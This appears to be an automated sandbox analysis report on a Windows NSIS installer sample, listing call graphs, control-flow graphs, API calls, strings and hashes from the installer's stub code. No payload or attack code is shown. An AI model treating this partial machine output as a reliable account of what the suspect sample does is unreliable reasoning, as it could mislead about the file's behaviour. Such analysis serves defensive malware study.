4143 406722 3 API calls 4142->4143 4144 401a75 lstrcatW 4143->4144 4144->4141 4147 401a81 4145->4147 4146 4062d5 2 API calls 4146->4147 4147->4146 4148 405e30 2 API calls 4147->4148 4150 401a98 CompareFileTime 4147->4150 4151 401ba9 4147->4151 4155 4062a3 11 API calls 4147->4155 4159 406009 lstrcpynW 4147->4159 4165 406805 18 API calls 4147->4165 4172 405ca0 MessageBoxIndirectW 4147->4172 4176 401b50 4147->4176 4183 401b5d 4147->4183 4184 405e50 GetFileAttributesW CreateFileW 4147->4184 4148->4147 4150->4147 4152 404f72 25 API calls 4151->4152 4154 401bb3 4152->4154 4153 404f72 25 API calls 4156 401b70 4153->4156 4157 40337f 37 API calls 4154->4157 4155->4147 4160 4062a3 11 API calls 4156->4160 4158 401bc6 4157->4158 4161 4062a3 11 API calls 4158->4161 4159->4147 4167 401b8b 4160->4167 4162 401bda 4161->4162 4163 401be9 SetFileTime 4162->4163 4164 401bf8 FindCloseChangeNotification 4162->4164 4163->4164 4166 401c09 4164->4166 4164->4167 4165->4147 4168 401c21 4166->4168 4169 401c0e 4166->4169 4171 406805 18 API calls 4168->4171 4170 406805 18 API calls 4169->4170 4173 401c16 lstrcatW 4170->4173 4174 401c29 4171->4174 4172->4147 4173->4174 4175 4062a3 11 API calls 4174->4175 4177 401c34 4175->4177 4178 401b93 4176->4178 4179 401b53 4176->4179 4180 405ca0 MessageBoxIndirectW 4177->4180 4181 4062a3 11 API calls 4178->4181 4182 4062a3 11 API calls 4179->4182 4180->4167 4181->4167 4182->4183 4183->4153 4184->4147 4185->4141 4186->4142 5010 40209f GetDlgItem GetClientRect 5011 40145c 18 API calls 5010->5011 5012 4020cf LoadImageW SendMessageW 5011->5012 5013 4030e3 5012->5013 5014 4020ed DeleteObject 5012->5014 5014->5013 5015 402b9f 5016 401446 18 API calls 5015->5016 5021 402ba7 5016->5021 5017 402c4a 5018 402bdf ReadFile 5020 402c3d 5018->5020 5018->5021 5019 401446 18 API calls 5019->5020 5020->5017 5020->5019 5027 402d17 ReadFile 5020->5027 5021->5017 5021->5018 5021->5020 5022 402c06 MultiByteToWideChar 5021->5022 5023 402c3f 5021->5023 5025 402c4f 5021->5025 5022->5021 5022->5025 5028 405f51 wsprintfW 5023->5028 5025->5020 5026 402c6b SetFilePointer 5025->5026 5026->5020 5027->5020 5028->5017 5029 402b23 GlobalAlloc 5030 402b39 5029->5030 5031 402b4b 5029->5031 5032 401446 18 API calls 5030->5032 5033 40145c 18 API calls 5031->5033 5034 402b41 5032->5034 5035 402b52 WideCharToMultiByte lstrlenA 5033->5035 5036 402b93 5034->5036 5037 402b84 WriteFile 5034->5037 5035->5034 5037->5036 5038 402384 GlobalFree 5037->5038 5038->5036 5040 4044a5 5041 404512 5040->5041 5042 4044df 5040->5042 5044 40451f GetDlgItem GetAsyncKeyState 5041->5044 5051 4045b1 5041->5051 5108 405c84 GetDlgItemTextW 5042->5108 5047 40453e GetDlgItem 5044->5047 5054 40455c 5044->5054 5045 4044ea 5048 406038 5 API calls 5045->5048 5046 40469d 5106 404833 5046->5106 5110 405c84 GetDlgItemTextW 5046->5110 5049 403d3f 19 API calls 5047->5049 5050 4044f0 5048->5050 5053 404551 ShowWindow 5049->5053 5056 403e74 5 API calls 5050->5056 5051->5046 5057 406805 18 API calls 5051->5057 5051->5106 5053->5054 5059 404579 SetWindowTextW 5054->5059 5064 405d59 4 API calls 5054->5064 5055 403dca 8 API calls 5060 404847 5055->5060 5061 4044f5 GetDlgItem 5056->5061 5062 40462f SHBrowseForFolderW 5057->5062 5058 4046c9 5063 40677e 18 API calls 5058->5063 5065 403d3f 19 API calls 5059->5065 5066 404503 IsDlgButtonChecked 5061->5066 5061->5106 5062->5046 5067 404647 CoTaskMemFree 5062->5067 5068 4046cf 5063->5068 5069 40456f 5064->5069 5070 404597 5065->5070 5066->5041 5071 406722 3 API calls 5067->5071 5111 406009 lstrcpynW 5068->5111 5069->5059 5075 406722 3 API calls 5069->5075 5072 403d3f 19 API calls 5070->5072 5073 404654 5071->5073 5076 4045a2 5072->5076 5077 40468b SetDlgItemTextW 5073->5077 5082 406805 18 API calls 5073->5082 5075->5059 5109 403d98 SendMessageW 5076->5109 5077->5046 5078 4046e6 5080 4062fc 3 API calls 5078->5080 5089 4046ee 5080->5089 5081 4045aa 5085 4062fc 3 API calls 5081->5085 5083 404673 lstrcmpiW 5082->5083 5083->5077 5086 404684 lstrcatW 5083->5086 5084 404730 5112 406009 lstrcpynW 5084->5112 5085->5051 5086->5077 5088 404739 5090 405d59 4 API calls 5088->5090 5089->5084 5094 406751 2 API calls 5089->5094 5095 404785 5089->5095 5091 40473f GetDiskFreeSpaceW 5090->5091 5093 404763 MulDiv 5091->5093 5091->5095 5093->5095 5094->5089 5097 4047e2 5095->5097 5098 4043ad 21 API calls 5095->5098 5096 404805 5113 403d85 EnableWindow 5096->5113 5097->5096 5099 40141d 80 API calls 5097->5099 5100 4047d3 5098->5100 5099->5096 5102 4047e4 SetDlgItemTextW 5100->5102 5103 4047d8 5100->5103 5102->5097 5104 4043ad 21 API calls 5103->5104 5104->5097 5105 404821 5105->5106 5114 403d61 5105->5114 5106->5055 5108->5045 5109->5081 5110->5058 5111->5078 5112->5088 5113->5105 5115 403d74 SendMessageW 5114->5115 5116 403d6f 5114->5116 5115->5106 5116->5115 5117 402da5 5118 4030e3 5117->5118 5119 402dac 5117->5119 5120 401446 18 API calls 5119->5120 5121 402db8 5120->5121 5122 402dbf SetFilePointer 5121->5122 5122->5118 5123 402dcf 5122->5123 5123->5118 5125 405f51 wsprintfW 5123->5125 5125->5118 5126 4030a9 SendMessageW 5127 4030c2 InvalidateRect 5126->5127 5128 4030e3 5126->5128 5127->5128 5129 401cb2 5130 40145c 18 API calls 5129->5130 5131 401c54 5130->5131 5132 4062a3 11 API calls 5131->5132 5135 401c64 5131->5135 5133 401c59 5132->5133 5134 406c9b 81 API calls 5133->5134 5134->5135 4078 4021b5 4079 40145c 18 API calls 4078->4079 4080 4021bb 4079->4080 4081 40145c 18 API calls 4080->4081 4082 4021c4 4081->4082 4083 40145c 18 API calls 4082->4083 4084 4021cd 4083->4084 4085 40145c 18 API calls 4084->4085 4086 4021d6 4085->4086 4087 404f72 25 API calls 4086->4087 4088 4021e2 ShellExecuteW 4087->4088 4089 40221b 4088->4089 4090 40220d 4088->4090 4092 4062a3 11 API calls 4089->4092 4091 4062a3 11 API calls 4090->4091 4091->4089 4093 402230 4092->4093 5143 402238 5144 40145c 18 API calls 5143->5144 5145 40223e 5144->5145 5146 4062a3 11 API calls 5145->5146 5147 40224b 5146->5147 5148 404f72 25 API calls 5147->5148 5149 402255 5148->5149 5150 405c3f 2 API calls 5149->5150 5151 40225b 5150->5151 5152 4062a3 11 API calls 5151->5152 5155 4022ac CloseHandle 5151->5155 5158 40226d 5152->5158 5154 4030e3 5155->5154 5156 402283 WaitForSingleObject 5157 402291 GetExitCodeProcess 5156->5157 5156->5158 5157->5155 5160 4022a3 5157->5160 5158->5155 5158->5156 5159 406332 2 API calls 5158->5159 5159->5156 5162 405f51 wsprintfW 5160->5162 5162->5155 5163 4040b8 5164 4040d3 5163->5164 5172 404201 5163->5172 5168 40410e 5164->5168 5194 403fca WideCharToMultiByte 5164->5194 5165 40426c 5166 404276 GetDlgItem 5165->5166 5167 40433e 5165->5167 5169 404290 5166->5169 5170 4042ff 5166->5170 5173 403dca 8 API calls 5167->5173 5175 403d3f 19 API calls 5168->5175 5169->5170 5178 4042b6 6 API calls 5169->5178 5170->5167 5179 404311 5170->5179 5172->5165 5172->5167 5174 40423b GetDlgItem SendMessageW 5172->5174 5177 404339 5173->5177 5199 403d85 EnableWindow 5174->5199 5176 40414e 5175->5176 5181 403d3f 19 API calls 5176->5181 5178->5170 5182 404327 5179->5182 5183 404317 SendMessageW 5179->5183 5186 40415b CheckDlgButton 5181->5186 5182->5177 5187 40432d SendMessageW 5182->5187 5183->5182 5184 404267 5185 403d61 SendMessageW 5184->5185 5185->5165 5197 403d85 EnableWindow 5186->5197 5187->5177 5189 404179 GetDlgItem 5198 403d98 SendMessageW 5189->5198 5191 40418f SendMessageW 5192 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5191->5192 5193 4041ac GetSysColor 5191->5193 5192->5177 5193->5192 5195 404007 5194->5195 5196 403fe9 GlobalAlloc WideCharToMultiByte 5194->5196 5195->5168 5196->5195 5197->5189 5198->5191 5199->5184 4094 401eb9 4095 401f24 4094->4095 4096 401ec6 4094->4096 4097 401f53 GlobalAlloc 4095->4097 4098 401f28 4095->4098 4099 401ed5 4096->4099 4106 401ef7 4096->4106 4100 406805 18 API calls 4097->4100 4105 4062a3 11 API calls 4098->4105 4110 401f36 4098->4110 4101 4062a3 11 API calls 4099->4101 4104 401f46 4100->4104 4102 401ee2 4101->4102 4107 402708 4102->4107 4112 406805 18 API calls 4102->4112 4104->4107 4108 402387 GlobalFree 4104->4108 4105->4110 4116 406009 lstrcpynW 4106->4116 4108->4107 4118 406009 lstrcpynW 4110->4118 4111 401f06 4117 406009 lstrcpynW 4111->4117 4112->4102 4114 401f15 4119 406009 lstrcpynW 4114->4119 4116->4111 4117->4114 4118->4104 4119->4107 5200 4074bb 5202 407344 5200->5202 5201 407c6d 5202->5201 5203 4073c2 GlobalFree 5202->5203 5204 4073cb GlobalAlloc 5202->5204 5205 407443 GlobalAlloc 5202->5205 5206 40743a GlobalFree 5202->5206 5203->5204 5204->5201 5204->5202 5205->5201 5205->5202 5206->5205

                                    Executed Functions

                                    Function 00403883 Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304filestringcomCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 146 403883-403919 #17 SetErrorMode OleInitialize call 4062fc SHGetFileInfoW call 406009 GetCommandLineW call 406009 GetModuleHandleW 153 403923-403937 call 405d06 CharNextW 146->153 154 40391b-40391e 146->154 157 4039ca-4039d0 153->157 154->153 158 4039d6 157->158 159 40393c-403942 157->159 160 4039f5-403a0d GetTempPathW call 4037cc 158->160 161 403944-40394a 159->161 162 40394c-403950 159->162 169 403a33-403a4d DeleteFileW call 403587 160->169 170 403a0f-403a2d GetWindowsDirectoryW lstrcatW call 4037cc 160->170 161->161 161->162 164 403952-403957 162->164 165 403958-40395c 162->165 164->165 167 4039b8-4039c5 call 405d06 165->167 168 40395e-403965 165->168 167->157 183 4039c7 167->183 172 403967-40396e 168->172 173 40397a-40398c call 403800 168->173 186 403acc-403adb call 403859 OleUninitialize 169->186 187 403a4f-403a55 169->187 170->169 170->186 174 403970-403973 172->174 175 403975 172->175 184 4039a1-4039b6 call 403800 173->184 185 40398e-403995 173->185 174->173 174->175 175->173 183->157 184->167 202 4039d8-4039f0 call 407d6e call 406009 184->202 189 403997-40399a 185->189 190 40399c 185->190 200 403ae1-403af1 call 405ca0 ExitProcess 186->200 201 403bce-403bd4 186->201 192 403ab5-403abc call 40592c 187->192 193 403a57-403a60 call 405d06 187->193 189->184 189->190 190->184 199 403ac1-403ac7 call 4060e7 192->199 203 403a79-403a7b 193->203 199->186 206 403c51-403c59 201->206 207 403bd6-403bf3 call 4062fc * 3 201->207 202->160 211 403a62-403a74 call 403800 203->211 212 403a7d-403a87 203->212 213 403c5b 206->213 214 403c5f 206->214 238 403bf5-403bf7 207->238 239 403c3d-403c48 ExitWindowsEx 207->239 211->212 225 403a76 211->225 219 403af7-403b11 lstrcatW lstrcmpiW 212->219 220 403a89-403a99 call 40677e 212->220 213->214 219->186 224 403b13-403b29 CreateDirectoryW SetCurrentDirectoryW 219->224 220->186 231 403a9b-403ab1 call 406009 * 2 220->231 228 403b36-403b56 call 406009 * 2 224->228 229 403b2b-403b31 call 406009 224->229 225->203 245 403b5b-403b77 call 406805 DeleteFileW 228->245 229->228 231->192 238->239 243 403bf9-403bfb 238->243 239->206 242 403c4a-403c4c call 40141d 239->242 242->206 243->239 247 403bfd-403c0f GetCurrentProcess 243->247 253 403bb8-403bc0 245->253 254 403b79-403b89 CopyFileW 245->254 247->239 252 403c11-403c33 247->252 252->239 253->245 255 403bc2-403bc9 call 406c68 253->255 254->253 256 403b8b-403bab call 406c68 call 406805 call 405c3f 254->256 255->186 256->253 266 403bad-403bb4 CloseHandle 256->266 266->253
                                    APIs
                                    • #17.COMCTL32 ref: 004038A2
                                    • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                    • OleInitialize.OLE32(00000000), ref: 004038B4
                                      • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                      • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                      • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                    • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                    • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                    • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                    • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                    • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                    • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                    • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                    • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                    • OleUninitialize.OLE32(?), ref: 00403AD1
                                    • ExitProcess.KERNEL32 ref: 00403AF1
                                    • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                    • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                    • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                    • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                    • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                    • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                    • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                    • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                    • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                    • API String ID: 2435955865-239407132
                                    • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                    • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                    • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                    • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E
                                    Function 004074BB Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 646 4074bb-4074c0 647 4074c2-4074ef 646->647 648 40752f-407547 646->648 650 4074f1-4074f4 647->650 651 4074f6-4074fa 647->651 649 407aeb-407aff 648->649 655 407b01-407b17 649->655 656 407b19-407b2c 649->656 652 407506-407509 650->652 653 407502 651->653 654 4074fc-407500 651->654 657 407527-40752a 652->657 658 40750b-407514 652->658 653->652 654->652 659 407b33-407b3a 655->659 656->659 662 4076f6-407713 657->662 663 407516 658->663 664 407519-407525 658->664 660 407b61-407c68 659->660 661 407b3c-407b40 659->661 677 407350 660->677 678 407cec 660->678 666 407b46-407b5e 661->666 667 407ccd-407cd4 661->667 669 407715-407729 662->669 670 40772b-40773e 662->670 663->664 665 407589-4075b6 664->665 673 4075d2-4075ec 665->673 674 4075b8-4075d0 665->674 666->660 671 407cdd-407cea 667->671 675 407741-40774b 669->675 670->675 676 407cef-407cf6 671->676 679 4075f0-4075fa 673->679 674->679 680 40774d 675->680 681 4076ee-4076f4 675->681 682 407357-40735b 677->682 683 40749b-4074b6 677->683 684 40746d-407471 677->684 685 4073ff-407403 677->685 678->676 688 407600 679->688 689 407571-407577 679->689 690 407845-4078a1 680->690 691 4076c9-4076cd 680->691 681->662 687 407692-40769c 681->687 682->671 692 407361-40736e 682->692 683->649 697 407c76-407c7d 684->697 698 407477-40748b 684->698 703 407409-407420 685->703 704 407c6d-407c74 685->704 693 4076a2-4076c4 687->693 694 407c9a-407ca1 687->694 706 407556-40756e 688->706 707 407c7f-407c86 688->707 695 40762a-407630 689->695 696 40757d-407583 689->696 690->649 699 407c91-407c98 691->699 700 4076d3-4076eb 691->700 692->678 708 407374-4073ba 692->708 693->690 694->671 709 40768e 695->709 710 407632-40764f 695->710 696->665 696->709 697->671 705 40748e-407496 698->705 699->671 700->681 711 407423-407427 703->711 704->671 705->684 715 407498 705->715 706->689 707->671 713 4073e2-4073e4 708->713 714 4073bc-4073c0 708->714 709->687 716 407651-407665 710->716 717 407667-40767a 710->717 711->685 712 407429-40742f 711->712 719 407431-407438 712->719 720 407459-40746b 712->720 723 4073f5-4073fd 713->723 724 4073e6-4073f3 713->724 721 4073c2-4073c5 GlobalFree 714->721 722 4073cb-4073d9 GlobalAlloc 714->722 715->683 718 40767d-407687 716->718 717->718 718->695 725 407689 718->725 726 407443-407453 GlobalAlloc 719->726 727 40743a-40743d GlobalFree 719->727 720->705 721->722 722->678 728 4073df 722->728 723->711 724->723 724->724 730 407c88-407c8f 725->730 731 40760f-407627 725->731 726->678 726->720 727->726 728->713 730->671 731->695
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                    • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                    • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                    • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                    Function 004062FC Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                    • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                    • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: AddressHandleLibraryLoadModuleProc
                                    • String ID:
                                    • API String ID: 310444273-0
                                    • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                    • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                    • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                    • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                    Function 004062D5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                    • FindClose.KERNEL32(00000000), ref: 004062EC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: Find$CloseFileFirst
                                    • String ID:
                                    • API String ID: 2295610775-0
                                    • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                    • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                    • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                    • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8
                                    Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 4015a0-4015f4 1 4030e3-4030ec 0->1 2 4015fa 0->2 26 4030ee-4030f2 1->26 4 401601-401611 call 4062a3 2->4 5 401742-40174f 2->5 6 401962-40197d call 40145c GetFullPathNameW 2->6 7 4019ca-4019e6 call 40145c SearchPathW 2->7 8 40176e-401794 call 40145c call 4062a3 SetFileAttributesW 2->8 9 401650-401668 call 40137e call 4062a3 call 40139d 2->9 10 4017b1-4017d8 call 40145c call 4062a3 call 405d59 2->10 11 401672-401686 call 40145c call 4062a3 2->11 12 401693-4016ac call 401446 call 4062a3 2->12 13 401715-401731 2->13 14 401616-40162d call 40145c call 4062a3 call 404f72 2->14 15 4016d6-4016db 2->15 16 401736-4030de 2->16 17 401897-4018a7 call 40145c call 4062d5 2->17 18 4018db-401910 call 40145c * 3 call 4062a3 MoveFileW 2->18 19 40163c-401645 2->19 20 4016bd-4016d1 call 4062a3 SetForegroundWindow 2->20 4->26 30 401751-401755 ShowWindow 5->30 31 401758-40175f 5->31 65 4019a3-4019a8 6->65 66 40197f-401984 6->66 7->1 58 4019ec-4019f8 7->58 8->1 83 40179a-4017a6 call 4062a3 8->83 92 40166d 9->92 105 401864-40186c 10->105 106 4017de-4017fc call 405d06 CreateDirectoryW 10->106 84 401689-40168e call 404f72 11->84 89 4016b1-4016b8 Sleep 12->89 90 4016ae-4016b0 12->90 13->26 27 401632-401637 14->27 24 401702-401710 15->24 25 4016dd-4016fd call 401446 15->25 16->1 60 4030de call 405f51 16->60 85 4018c2-4018d6 call 4062a3 17->85 86 4018a9-4018bd call 4062a3 17->86 113 401912-401919 18->113 114 40191e-401921 18->114 19->27 28 401647-40164e PostQuitMessage 19->28 20->1 24->1 25->1 27->26 28->27 30->31 31->1 49 401765-401769 ShowWindow 31->49 49->1 58->1 60->1 69 4019af-4019b2 65->69 66->69 76 401986-401989 66->76 69->1 79 4019b8-4019c5 GetShortPathNameW 69->79 76->69 87 40198b-401993 call 4062d5 76->87 79->1 100 4017ab-4017ac 83->100 84->1 85->26 86->26 87->65 110 401995-4019a1 call 406009 87->110 89->1 90->89 92->26 100->1 108 401890-401892 105->108 109 40186e-40188b call 404f72 call 406009 SetCurrentDirectoryW 105->109 118 401846-40184e call 4062a3 106->118 119 4017fe-401809 GetLastError 106->119 108->84 109->1 110->69 113->84 120 401923-40192b call 4062d5 114->120 121 40194a-401950 114->121 133 401853-401854 118->133 124 401827-401832 GetFileAttributesW 119->124 125 40180b-401825 GetLastError call 4062a3 119->125 120->121 139 40192d-401948 call 406c68 call 404f72 120->139 129 401957-40195d call 4062a3 121->129 131 401834-401844 call 4062a3 124->131 132 401855-40185e 124->132 125->132 129->100 131->133 132->105 132->106 133->132 139->129
                                    APIs
                                    • PostQuitMessage.USER32(00000000), ref: 00401648
                                    • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                    • SetForegroundWindow.USER32(?), ref: 004016CB
                                    • ShowWindow.USER32(?), ref: 00401753
                                    • ShowWindow.USER32(?), ref: 00401767
                                    • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                    • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                    • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                    • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                    • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                    • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                    • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                    • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                    • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                    • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                    Strings
                                    • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                    • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                    • detailprint: %s, xrefs: 00401679
                                    • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
